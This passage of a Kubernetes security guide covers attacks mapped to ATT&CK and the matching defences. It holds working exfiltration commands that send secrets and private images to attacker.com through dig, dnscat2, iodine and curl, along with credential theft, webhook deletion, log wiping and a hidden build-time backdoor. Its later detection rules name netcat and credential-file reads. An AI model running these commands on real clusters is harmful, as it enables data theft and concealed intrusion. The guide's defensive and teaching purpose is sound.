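def from_labels(labels: list) -> bytes:
    """Reassemble the original bytes on the receiving DNS server."""
    encoded = "".join(labels).upper()
    encoded += "=" * (-len(encoded) % 8)
    return base64.b32decode(encoded)
```

The sender queries one label per lookup (`<label>.<seq>.exfil.attacker.com` is one hypothetical scheme); the authoritative server logs the labels and calls `from_labels`.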

# Faster: use dig with encoded data (strip '=' padding -- invalid in hostnames)
SECRET=$(kubectl get secret db-creds -o jsonpath='{.data.password}' | tr -d '=')
dig $SECRET.data.attacker.com

# Tool: dnscat2 for tunneling
# From pod:
dnscat2 --dns server=attacker.com,port=53

# iodine for IP-over-DNS tunneling
iodine -f attacker.com

8.4 Container Registry Theft

# Steal images from private registries using imagePullSecrets

# Get registry credentials
kubectl get secrets -A -o json | jq '
  .items[] | select(.type == "kubernetes.io/dockerconfigjson") |
  {ns: .metadata.namespace, name: .metadata.name,
   config: (.data[".dockerconfigjson"] | @base64d | fromjson)}'

# Use stolen credentials to pull proprietary images
# The dockerconfigjson embeds base64("user:pass") per registry in .auths[].auth
kubectl get secret regcred -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d | \
  jq -r '.auths | to_entries[].value.auth' | base64 -d
# Log in with the recovered user:pass, then pull
docker login [REGISTRY] -u [USER] -p [PASS]
docker pull [REGISTRY]/proprietary-app:latest

# Exfil the image
docker save [REGISTRY]/proprietary-app:latest | gzip | \
  curl -X POST -H "Content-Type: application/gzip" --data-binary @- https://attacker.com/images

8.5 HTTP/HTTPS Exfiltration via Egress

# If egress is not restricted by NetworkPolicy:
# Direct HTTP exfil
curl -X POST https://attacker.com/exfil \
  -d "$(kubectl get secrets -A -o json | base64)"

# Chunked exfil for large data
tar czf - /data | split -b 1M - /tmp/chunk_
for f in /tmp/chunk_*; do
  curl -X POST -F "file=@$f" https://attacker.com/upload
  rm "$f"
done

# Exfil via cloud storage (using stolen cloud credentials)
aws s3 cp /data/dump.sql s3://attacker-bucket/
gsutil cp /data/dump.sql gs://attacker-bucket/

9. Defense Evasion

9.1 Pod Security Bypass

ATT&CK: T1562.001 (Disable or Modify Tools)

# Pod Security Standards (PSS) enforcement bypass techniques:

# 1. Use namespaces without PSS labels
kubectl get ns --show-labels | grep -v "pod-security"
# Deploy to unlabeled namespaces

# 2. Use resource types that create pods indirectly
# If admission only checks Pods, use CronJobs/Jobs/DaemonSets
# Some webhooks only intercept CREATE on pods, not the controllers

# 3. Ephemeral containers (often not covered by PSS)
kubectl debug -it [POD] --image=ubuntu --target=[CONTAINER]
# Debug containers may bypass security context requirements

# 4. Static pods bypass PSS entirely (see Section 6.3)
# Write to /etc/kubernetes/manifests/ on the node

# 5. Namespace label manipulation (if you can update namespaces)
kubectl label namespace target pod-security.kubernetes.io/enforce=privileged --overwrite

9.2 Admission Controller Evasion

# 1. Check which resources/operations the webhook intercepts
kubectl get validatingwebhookconfigurations -o yaml | grep -A10 "rules:"
kubectl get mutatingwebhookconfigurations -o yaml | grep -A10 "rules:"

# 2. Use resource types not covered by webhooks
# Example: webhook covers pods but not cronjobs
# Create a CronJob that spawns a privileged pod

# 3. Target excluded namespaces
# Webhooks often exclude kube-system
kubectl get mutatingwebhookconfigurations -o json | jq '
  .items[].webhooks[].namespaceSelector'

# 4. Delete or modify the webhook configuration
kubectl delete validatingwebhookconfigurations [NAME]
kubectl delete mutatingwebhookconfigurations [NAME]

# 5. Make the webhook service unreachable (if failurePolicy: Ignore)
# Delete the webhook backend service/deployment
kubectl delete svc [WEBHOOK_SVC] -n [WEBHOOK_NS]
# Now all requests bypass the webhook

# 6. TOCTOU: create a compliant pod, then patch it
kubectl run benign --image=nginx
# Wait for admission...
kubectl patch pod benign --type='json' -p='[
  {"op":"add","path":"/spec/containers/0/securityContext","value":{"privileged":true}}
]'
# Note: this often fails for immutable fields, but works for some

9.3 Log Tampering and Event Deletion

# Delete Kubernetes events to hide tracks
kubectl delete events --all -n [NAMESPACE]
kubectl delete events --field-selector reason=Created -n default

# If you have access to the node:
# Truncate container logs (truncate handles multiple files; a glob after '>' does not)
truncate -s0 /var/log/containers/[POD_NAME]*.log
truncate -s0 /var/log/pods/[NAMESPACE]_[POD]_[UID]/[CONTAINER]/*.log

# Clear kubelet logs
echo "" > /var/log/kubelet.log
journalctl --vacuum-time=1s -u kubelet

# Clear audit logs (if stored locally)
echo "" > /var/log/kubernetes/audit/audit.log

# Modify API server audit policy to reduce logging
# (if you can modify kube-apiserver static pod manifest)

9.4 Pod/Container Name Similarity

# Use names that blend in with legitimate system pods
# kube-system namespace naming patterns:
# kube-proxy-xxxxx, coredns-xxxxx, etcd-master, kube-apiserver-master

kubectl run kube-proxy-monitor --image=ubuntu -n kube-system \
  --labels="k8s-app=kube-proxy" -- sleep infinity

# Use legitimate-looking image names
# Instead of: attacker/backdoor:latest
# Use: k8s.gcr.io/metrics-server:v0.6.3 (built from your own Dockerfile)

9.5 Rootless Container Escape Techniques

# Even without privileged: true, certain capabilities enable escape

# CAP_SYS_ADMIN alone
# Allows mount, cgroup manipulation, many kernel operations
# Check current capabilities:
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')

# CAP_DAC_READ_SEARCH
# Read any file on the host (if combined with hostPath)
# CDK: cdk run cap-dac-read-search /etc/shadow

# CAP_NET_ADMIN + hostNetwork
# ARP spoof, route manipulation, packet capture

# CAP_SYS_PTRACE + hostPID
# Inject into host processes (see Section 3.4)

9.6 Image Build-Time Evasion

# Multi-stage build to hide malicious tools
FROM golang:1.21 AS builder
COPY backdoor.go .
RUN go build -o /backdoor backdoor.go

FROM gcr.io/distroless/static:nonroot
COPY --from=builder /backdoor /usr/local/bin/healthcheck
# Appears clean in image scan -- distroless base, no shell
# Backdoor is a statically compiled Go binary

10. Detection Engineering

10.1 Falco Rules for Kubernetes Attacks

# === Container Escape Detection ===

- rule: Container Escape via nsenter
  desc: Detect nsenter execution indicating container-to-host escape
  condition: >
    spawned_process and
    proc.name = "nsenter" and
    container.id != ""
  output: >
    nsenter executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository pid=%proc.pid)
  priority: CRITICAL
  tags: [container, escape, mitre_privilege_escalation, T1611]

- rule: Docker Socket Access from Container
  desc: Detect container accessing Docker socket for potential escape
  condition: >
    container.id != host and
    (fd.name = "/var/run/docker.sock" or
     fd.name = "/run/containerd/containerd.sock" or
     fd.name = "/var/run/crio/crio.sock") and
    (evt.type in (open, openat, openat2))
  output: >
    Container runtime socket accessed from container
    (user=%user.name command=%proc.cmdline file=%fd.name container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

- rule: Mount Executed in Container
  desc: Detect mount command in container indicating escape attempt
  condition: >
    spawned_process and
    proc.name = "mount" and
    container.id != host
  output: >
    Mount command executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository)
  priority: HIGH
  tags: [container, escape, T1611]

- rule: Write to Core Pattern File
  desc: Detect modification of core_pattern for container escape
  condition: >
    open_write and
    fd.name = "/proc/sys/kernel/core_pattern" and
    container.id != host
  output: >
    Core pattern modified from container (user=%user.name command=%proc.cmdline
    container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# === Credential Access Detection ===

- rule: Read Sensitive File in Container
  desc: Detect access to sensitive credential files
  condition: >
    open_read and
    container.id != host and
    (fd.name startswith "/etc/shadow" or
     fd.name startswith "/etc/kubernetes" or
     fd.name contains "/serviceaccount/token" or
     fd.name contains "/.kube/config")
  output: >
    Sensitive file read in container (user=%user.name command=%proc.cmdline
    file=%fd.name container=%container.name)
  priority: HIGH
  tags: [container, credential_access, T1552]

- rule: Cloud Metadata Access from Container
  desc: Detect container accessing cloud instance metadata service
  condition: >
    container.id != host and
    ((fd.sip = "169.254.169.254") or
     (fd.sip = "169.254.170.2")) and
    evt.type in (connect, sendto)
  output: >
    Cloud metadata service accessed from container
    (user=%user.name command=%proc.cmdline container=%container.name
    dest=%fd.sip:%fd.sport)
  priority: HIGH
  tags: [container, credential_access, T1552.005]

# === Lateral Movement Detection ===

- rule: Network Scanning Tool in Container
  desc: Detect network reconnaissance tools running in containers
  condition: >
    spawned_process and
    container.id != host and
    (proc.name in (nmap, masscan, nping, netcat, nc, ncat, socat, arpspoof, tcpdump))
  output: >
    Network tool executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository)
  priority: HIGH
  tags: [container, discovery, T1046]

# === Persistence Detection ===

- rule: Write to Kubernetes Static Pod Manifests
  desc: Detect writes to kubelet static pod manifest directory
  condition: >
    open_write and
    fd.name startswith "/etc/kubernetes/manifests/" and
    not proc.name in (kubelet, kubeadm)
  output: >
    Static pod manifest modified (user=%user.name command=%proc.cmdline
    file=%fd.name)
  priority: CRITICAL
  tags: [host, persistence, T1543.005]

- rule: Unexpected Shell in Container
  desc: Detect shell spawned in container (possible exec or RCE)
  condition: >
    spawned_process and
    container.id != host and
    proc.name in (bash, sh, dash, zsh, csh, ksh, fish) and
    not proc.pname in (entrypoint.sh, start.sh, run.sh, docker-entrypoint.sh)
  output: >
    Shell spawned in container (user=%user.name shell=%proc.name parent=%proc.pname
    container=%container.name image=%container.image.repository)
  priority: WARNING
  tags: [container, execution, T1059]

# === Defense Evasion Detection ===

- rule: Kubernetes Event Deletion
  desc: Detect deletion of Kubernetes events (covering tracks)
  condition: >
    kevt and
    kdelete and
    ka.target.resource = "events"
  output: >
    Kubernetes events deleted (user=%ka.user.name namespace=%ka.target.namespace
    response=%ka.response.code)
  priority: HIGH
  tags: [k8s, defense_evasion, T1070]

- rule: Log File Truncation on Host
  desc: Detect truncation of container or kubelet log files
  condition: >
    open_write and
    (fd.name startswith "/var/log/containers/" or
     fd.name startswith "/var/log/pods/" or
     fd.name = "/var/log/kubelet.log") and
    evt.arg.flags contains "O_TRUNC"
  output: >
    Log file truncated (user=%user.name command=%proc.cmdline file=%fd.name)
  priority: HIGH
  tags: [host, defense_evasion, T1070]

10.2 Sigma Rules for API Audit Logs

# === Privilege Escalation ===

title: Kubernetes ClusterRoleBinding to cluster-admin Created
id: f8e2d3a1-b4c5-4d6e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects creation of ClusterRoleBinding with cluster-admin privileges
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: clusterrolebindings
  privilege:
    requestObject.roleRef.name: cluster-admin
  condition: selection and privilege
falsepositives:
  - Helm chart installations requiring cluster-admin
  - Operator deployments during initial cluster setup
level: critical
tags:
  - attack.t1098.006
  - attack.privilege_escalation
---
title: Kubernetes Impersonation Request
id: a2b3c4d5-e6f7-8901-abcd-ef2345678901
status: experimental
description: Detects API requests using user/group impersonation
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    impersonatedUser.username|exists: true
  filter_system:
    user.username|startswith: "system:"
    impersonatedUser.username|startswith: "system:"
  condition: selection and not filter_system
falsepositives:
  - Legitimate admin tools using impersonation for testing
level: high
tags:
  - attack.t1134
  - attack.privilege_escalation
---
title: Privileged Kubernetes Pod Created
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects creation of privileged pods enabling container escape
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: pods
  condition_priv:
    requestObject.spec.containers[*].securityContext.privileged: true
  condition: selection and condition_priv
falsepositives:
  - kube-proxy, CNI pods, and monitoring agents that require privileged mode
level: high
tags:
  - attack.t1611
  - attack.privilege_escalation
---
title: Bulk Secret Enumeration via Kubernetes API
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects listing all secrets across namespaces indicating credential harvesting
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: list
    objectRef.resource: secrets
    objectRef.namespace|exists: false   # cluster-wide list has no namespace in objectRef
  condition: selection
falsepositives:
  - Backup controllers and security compliance scanners
level: critical
tags:
  - attack.t1528
  - attack.credential_access
---
title: Kubernetes Exec into Pod
id: d4e5f6a7-b8c9-0123-def0-456789012345
status: experimental
description: Detects exec operations into pods which may indicate lateral movement
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: pods
    objectRef.subresource: exec
  condition: selection
falsepositives:
  - Developers debugging pods in development namespaces
  - Automated health check systems
level: medium
tags:
  - attack.t1609
  - attack.execution
---
title: Admission Webhook Configuration Changed
id: e5f6a7b8-c9d0-1234-ef01-567890123456
status: experimental
description: Detects creation or modification of admission webhooks
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection_mutating:
    verb|re: "create|update|patch"
    objectRef.resource: mutatingwebhookconfigurations
  selection_validating:
    verb|re: "create|update|patch"
    objectRef.resource: validatingwebhookconfigurations
  condition: selection_mutating or selection_validating
falsepositives:
  - cert-manager and Istio webhook updates
  - Operator installations
level: high
tags:
  - attack.t1098
  - attack.persistence
---
title: Anonymous Kubernetes API Access
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects API server access by anonymous/unauthenticated users
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    user.username:
    - "system:anonymous"
  filter_health:
    requestURI|re: "^/(healthz|livez|readyz)"
  condition: selection and not filter_health
falsepositives:
  - Load balancer health checks hitting non-health endpoints
level: high
tags:
  - attack.t1078.001
  - attack.initial_access
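Where no SIEM ingests the audit log yet, the bulk-secret-enumeration logic above can be applied straight to the JSONL audit file. A grep/jq sketch over illustrative sample entries (real audit events carry many more fields; the /tmp path and usernames are hypothetical):

```shell
# Illustrative audit log, one JSON event per line
cat > /tmp/audit.jsonl <<'EOF'
{"verb":"list","objectRef":{"resource":"secrets"},"user":{"username":"system:serviceaccount:velero:backup"}}
{"verb":"get","objectRef":{"resource":"pods"},"user":{"username":"alice"}}
{"verb":"list","objectRef":{"resource":"secrets"},"user":{"username":"jane"}}
EOF

# Who is listing secrets? (the Sigma selection: verb=list, resource=secrets)
grep '"verb":"list"' /tmp/audit.jsonl \
  | grep '"resource":"secrets"' \
  | jq -r '.user.username' \
  | sort | uniq -c | sort -rn
```

Unexpected human users or service accounts in this output are the leads the Sigma rule would have surfaced.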

10.3 API Audit Log Policy

# Comprehensive audit policy for security monitoring
# (rules are evaluated top-down; the first matching rule wins)
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log all secret operations at RequestResponse level
- level: RequestResponse
  resources:
  - group: ""
    resources: ["secrets"]

# Log all RBAC changes
- level: RequestResponse
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]

# Log pod exec and attach
- level: RequestResponse
  resources:
  - group: ""
    resources: ["pods/exec", "pods/attach", "pods/portforward"]

# Log admission webhook changes
- level: RequestResponse
  resources:
  - group: "admissionregistration.k8s.io"

# Log service account token creation
- level: RequestResponse
  resources:
  - group: ""
    resources: ["serviceaccounts/token"]

# Log node and namespace changes
- level: RequestResponse
  resources:
  - group: ""
    resources: ["nodes", "namespaces"]

# Log pod creation at Metadata level
- level: Metadata
  resources:
  - group: ""
    resources: ["pods"]
  - group: "apps"
    resources: ["deployments", "daemonsets", "statefulsets", "replicasets"]
  - group: "batch"
    resources: ["jobs", "cronjobs"]

# Log ConfigMap changes
- level: Metadata
  resources:
  - group: ""
    resources: ["configmaps"]

# Skip health checks and status updates
- level: None
  resources:
  - group: ""
    resources: ["events", "endpoints"]
- level: None
  users: ["system:kube-proxy"]
  verbs: ["watch"]
- level: None
  nonResourceURLs:
  - "/healthz*"
  - "/livez*"
  - "/readyz*"
  - "/metrics"

# Default: log everything else at Metadata
- level: Metadata

10.4 OPA/Gatekeeper Policies

# Block privileged containers
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockedprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8sblockedprivileged
      violation[{"msg": msg}] {
        container := input.review.object.spec.containers[_]
        container.securityContext.privileged == true
        msg := sprintf("Privileged container '%v' is not allowed", [container.name])
      }
      violation[{"msg": msg}] {
        container := input.review.object.spec.initContainers[_]
        container.securityContext.privileged == true
        msg := sprintf("Privileged init container '%v' is not allowed", [container.name])
      }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: block-privileged-containers
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    excludedNamespaces: ["kube-system"]

10.5 Kyverno Policies

# Block hostPath volumes
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-hostpath
  annotations:
    policies.kyverno.io/title: Block hostPath Volumes
    policies.kyverno.io/severity: high
spec:
  validationFailureAction: Enforce
  rules:
  - name: block-hostpath-volumes
    match:
      any:
      - resources:
          kinds:
          - Pod
    exclude:
      any:
      - resources:
          namespaces:
          - kube-system
    validate:
      message: "hostPath volumes are not allowed."
      pattern:
        spec:
          =(volumes):
          - X(hostPath): "null"
---
# Require non-root containers
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-run-as-non-root
spec:
  validationFailureAction: Enforce
  rules:
  - name: run-as-non-root
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Containers must run as non-root."
      pattern:
        spec:
          containers:
          - securityContext:
              runAsNonRoot: true
---
# Block cloud metadata access via NetworkPolicy generation
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-metadata-service
spec:
  rules:
  - name: generate-netpol-block-metadata
    match:
      any:
      - resources:
          kinds:
          - Namespace
    generate:
      kind: NetworkPolicy
      apiVersion: networking.k8s.io/v1
      name: block-cloud-metadata
      namespace: "{{request.object.metadata.name}}"
      data:
        spec:
          podSelector: {}
          policyTypes:
          - Egress
          egress:
          - to:
            - ipBlock:
                cidr: 0.0.0.0/0
                except:
                - 169.254.169.254/32

10.6 Runtime Monitoring with Tetragon

# Tetragon TracingPolicy for container escape detection
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
spec:
  kprobes:
  # Detect cgroup release_agent manipulation
  - call: "security_file_open"
    syscall: false
    args:
    - index: 0
      type: "file"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Postfix"
        values:
        - "release_agent"
    - matchActions:
      - action: Sigkill  # Kill the process attempting the escape
  # Detect nsenter
  - call: "__x64_sys_setns"
    syscall: true
    args:
    - index: 0
      type: "int"
    selectors:
    - matchActions:
      - action: Post
        rateLimit: "1m"

11. Hardening

11.1 Pod Security Standards (PSS)

# Apply to namespaces via labels (Kubernetes 1.25+, replaces PodSecurityPolicy)
# Three profiles: Privileged (unrestricted), Baseline (minimally restrictive), Restricted (hardened)

# Enforce Restricted profile on a namespace
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

Restricted profile blocks:

  • Privileged containers
  • hostPID, hostIPC, hostNetwork
  • hostPath volumes
  • Host ports
  • Capabilities beyond NET_BIND_SERVICE
  • Running as root
  • Privilege escalation
  • Unconfined or unset seccomp profiles (RuntimeDefault or Localhost required)

# Minimal compliant pod under the Restricted profile
apiVersion: v1
kind: Pod
metadata:
  name: hardened-pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: myapp:v1.0@sha256:abc123...
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
    resources:
      limits:
        cpu: "500m"
        memory: "256Mi"
      requests:
        cpu: "100m"
        memory: "128Mi"

11.2 Network Policies

# Default deny ALL traffic in namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
---
# Allow only specific pod-to-pod communication
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080
---
# Block cloud metadata from all pods
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
---
# Allow DNS egress (required for service discovery)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53
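The except clause in the block-metadata policy above allows all egress and carves out only the /32. A toy bash helper (not any real API) to sanity-check which destinations that policy drops:

```shell
# Convert dotted-quad to integer for comparison
ip_to_int() { local IFS=.; set -- $1; echo $(( ($1<<24) | ($2<<16) | ($3<<8) | $4 )); }

# allowed <dst-ip> -> yes/no under "cidr 0.0.0.0/0 except 169.254.169.254/32"
allowed() {
  if [ "$(ip_to_int "$1")" -eq "$(ip_to_int 169.254.169.254)" ]; then
    echo no
  else
    echo yes
  fi
}

allowed 169.254.169.254   # metadata IP -> no
allowed 10.0.12.7         # in-cluster IP -> yes
```

Everything except the metadata address stays reachable, which is exactly why this policy pairs with the default-deny policy rather than replacing it.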

11.3 RBAC Least Privilege

# Dedicated service account per workload (never use default)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: frontend-sa
  namespace: production
automountServiceAccountToken: false  # Don't mount unless needed
---
# Minimal Role -- only what the application needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: frontend-role
  namespace: production
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["frontend-config"]  # Specific resource, not wildcard
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: frontend-binding
  namespace: production
subjects:
- kind: ServiceAccount
  name: frontend-sa
  namespace: production
roleRef:
  kind: Role
  name: frontend-role
  apiGroup: rbac.authorization.k8s.io
# RBAC audit commands
# Find all cluster-admin bindings
kubectl get clusterrolebindings -o json | jq '
  .items[] | select(.roleRef.name == "cluster-admin") |
  {name: .metadata.name, subjects: .subjects}'

# Find roles with wildcard permissions
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? | .verbs[]? == "*") |
  {name: .metadata.name}'

# Find service accounts that can access secrets
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? |
    (.resources[]? == "secrets") and
    ((.verbs[]? == "get") or (.verbs[]? == "list") or (.verbs[]? == "*"))
  ) | .metadata.name'

# Check specific SA permissions
kubectl auth can-i --list --as=system:serviceaccount:production:frontend-sa

# Tool: kubectl-who-can
kubectl who-can get secrets -A
kubectl who-can create pods -n kube-system
kubectl who-can create clusterrolebindings
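The jq filters above can be dry-tested against captured API output before pointing them at production. Sample data is illustrative (binding and subject names are hypothetical):

```shell
# Hypothetical capture of `kubectl get clusterrolebindings -o json`
cat > /tmp/crbs.json <<'EOF'
{"items":[
 {"metadata":{"name":"viewer-binding"},"roleRef":{"name":"view"},
  "subjects":[{"kind":"Group","name":"dev-team"}]},
 {"metadata":{"name":"ci-admin"},"roleRef":{"name":"cluster-admin"},
  "subjects":[{"kind":"ServiceAccount","name":"ci-deployer","namespace":"ci"}]}
]}
EOF

# Same cluster-admin filter as above, with subjects printed inline
jq -r '.items[]
  | select(.roleRef.name == "cluster-admin")
  | "\(.metadata.name): \(.subjects[] | "\(.kind)/\(.name)")"' /tmp/crbs.json
```

A ServiceAccount subject bound to cluster-admin, as in the sample, is almost always a finding.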

11.4 Secrets Management with external-secrets

# External Secrets Operator syncs secrets from external providers
# Avoids storing secrets in etcd entirely

# SecretStore pointing to AWS Secrets Manager
apiVersion: external-secrets.io/v1beta1
kind: SecretStore
metadata:
  name: aws-secrets
  namespace: production
spec:
  provider:
    aws:
      service: SecretsManager
      region: us-east-1
      auth:
        jwt:
          serviceAccountRef:
            name: external-secrets-sa
---
# ExternalSecret that syncs from AWS
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: db-credentials
  namespace: production
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: aws-secrets
    kind: SecretStore
  target:
    name: db-credentials
    creationPolicy: Owner
  data:
  - secretKey: username
    remoteRef:
      key: production/db
      property: username
  - secretKey: password
    remoteRef:
      key: production/db
      property: password
---
# HashiCorp Vault provider
apiVersion: external-secrets.io/v1beta1
kind: SecretStore
metadata:
  name: vault
  namespace: production
spec:
  provider:
    vault:
      server: "https://vault.internal:8200"
      path: "secret"
      version: "v2"
      auth:
        kubernetes:
          mountPath: "kubernetes"
          role: "production-role"
          serviceAccountRef:
            name: vault-auth-sa

11.5 Control Plane Hardening Checklist

# API Server
--anonymous-auth=false
--authorization-mode=Node,RBAC
--enable-admission-plugins=NodeRestriction,PodSecurity,AlwaysPullImages
--audit-log-path=/var/log/kubernetes/audit/audit.log
--audit-policy-file=/etc/kubernetes/audit-policy.yaml
--audit-log-maxage=30
--audit-log-maxbackup=10
--audit-log-maxsize=100
--insecure-port=0                 # flag removed in 1.20+; only relevant on older clusters
--profiling=false
--service-account-lookup=true
--kubelet-certificate-authority=/etc/kubernetes/pki/ca.crt
--tls-cipher-suites=TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,...
--encryption-provider-config=/etc/kubernetes/encryption-config.yaml

# etcd
--client-cert-auth=true
--peer-client-cert-auth=true
--trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
# File permissions: chmod 700 /var/lib/etcd

# Kubelet
--anonymous-auth=false
--authorization-mode=Webhook
--read-only-port=0
--rotate-certificates=true
--protect-kernel-defaults=true
--streaming-connection-idle-timeout=5m
--tls-cert-file=...
--tls-private-key-file=...

# Encryption at rest config
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: [BASE64_ENCODED_32_BYTE_KEY]
  - identity: {}  # Fallback for reading unencrypted secrets
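The aescbc provider expects exactly 32 random bytes, base64-encoded to 44 characters. Generating and sanity-checking a key (assumes Linux coreutils):

```shell
# Generate a fresh 32-byte key for the EncryptionConfiguration above
KEY=$(head -c 32 /dev/urandom | base64 | tr -d '\n')
printf '%s' "$KEY" | wc -c               # 44 -- base64 of 32 bytes
printf '%s' "$KEY" | base64 -d | wc -c   # 32 -- decodes back to 32 raw bytes
```

Enabling encryption only affects newly written objects; existing secrets must be rewritten, e.g. `kubectl get secrets -A -o json | kubectl replace -f -`.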

11.6 Image Security

# Kyverno policy: require image signatures (cosign)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  rules:
  - name: verify-cosign-signature
    match:
      any:
      - resources:
          kinds:
          - Pod
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - count: 1
        entries:
        - keys:
            publicKeys: |-
              -----BEGIN PUBLIC KEY-----
              MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE...
              -----END PUBLIC KEY-----
---
# Kyverno policy: require image digests (no tags)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-image-digest
spec:
  validationFailureAction: Enforce
  rules:
  - name: require-digest
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Images must use digest, not tag."
      pattern:
        spec:
          containers:
          - image: "*@sha256:*"

12. Offensive and Defensive Tooling

12.1 Offensive Tools

| Tool | Purpose | Key Capability |
| --- | --- | --- |
| CDK | Container/K8s pentesting | Zero-dep binary, 20+ escape exploits, K8s API attacks |
| Peirates | K8s penetration testing | SA token theft, pod exec, cloud metadata, registry brute |
| KubeHound | Attack graph modeling | BloodHound-style graph analysis of K8s attack paths |
| kube-hunter | Vulnerability scanner | External/internal scan, active exploitation, ATT&CK mapping |
| kubectl-who-can | RBAC analysis | Find who can perform specific actions |
| rbac-tool | RBAC visualization | Policy analysis, graph generation, audit |
| kubeaudit | Security auditing | Manifest scanning for misconfigurations |
| BOtB | Container escape | Break Out The Box -- automated escape techniques |
# CDK usage
cdk evaluate --full               # Comprehensive container evaluation
cdk run shim-pwn                  # CVE-2020-15257 containerd shim escape
cdk run mount-cgroup              # Cgroup release_agent escape
cdk run k8s-secret-dump           # Extract K8s secrets
cdk run k8s-backdoor-daemonset    # DaemonSet persistence
cdk probe [ip] [port] [parallel]  # Port scanning

# Peirates
./peirates                        # Interactive menu
# Options: switch SA, steal tokens, list secrets, exec in pods,
# create hostfs pods, cloud metadata, registry brute-force

# kubectl-who-can
kubectl who-can get secrets -n kube-system
kubectl who-can create pods -n default
kubectl who-can create clusterrolebindings
kubectl who-can impersonate users

# rbac-tool
rbac-tool lookup                  # Show all RBAC bindings
rbac-tool policy-rules            # Show effective permissions
rbac-tool who-can get secrets     # Similar to kubectl-who-can
rbac-tool viz                     # Generate graph visualization

12.2 Defensive Tools

| Tool | Purpose | Deployment |
| --- | --- | --- |
| kube-bench | CIS benchmark | Job or binary |
| Kubescape | Multi-framework scanner | CLI, CI/CD, operator |
| Falco | Runtime threat detection | DaemonSet |
